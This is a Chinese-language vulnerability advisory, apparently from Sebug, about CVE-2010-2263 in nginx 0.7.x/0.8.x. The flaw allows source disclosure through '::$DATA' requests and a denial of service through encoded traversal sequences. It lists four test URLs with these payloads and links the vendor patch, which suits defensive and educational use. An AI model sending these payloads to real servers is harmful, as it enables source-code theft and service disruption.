发布日期:2013-03-25 13:05 来源:未知 标签: nginx HTTP 源码 泄露 漏洞

漏洞版本:
nginx 0.7.x/0.8.x

漏洞描述:BugCVE: CVE-2010-2263
BUGTRAQ: 40760

nginx是多平台的HTTP服务器和邮件代理服务器

nginx服务器无法处理交换数据流(ADS),将其处理为普通文件的数据量。攻击者可以使用filename::$data的形式读取并下载Web应用文件的源码;此外如果在HTTP请求中添加了目录遍历序列的话,就可以覆盖内存寄存器,导致拒绝服务。<* 参考
http://www.exploit-db.com/exploits/13822/
http://www.exploit-db.com/exploits/13818/
http://sebug.net/appdir/Nginx/
*>
测试方法:@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1.http://www.example.com/index.html::$DATA
2.http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
3.http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
4.http://www.example.com/%c0.%c0./%c0.%c0./%20

安全建议:厂商补丁:
Igor Sysoev
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://nginx.org/download/nginx-0.8.40.zip

相关评论

专题信息
    Nginx ("engine x") 是一个高性能的 HTTP 和 反向代理 服务器,也是一个 IMAP/POP3/SMTP 代理服务器。 Nginx 是由 Igor Sysoev 为俄罗斯访问量第二的 Rambler.ru 站点开发的,第一个公开版本0.1.0发布于2004年10月4日。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、示例配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx 1.0.4发布。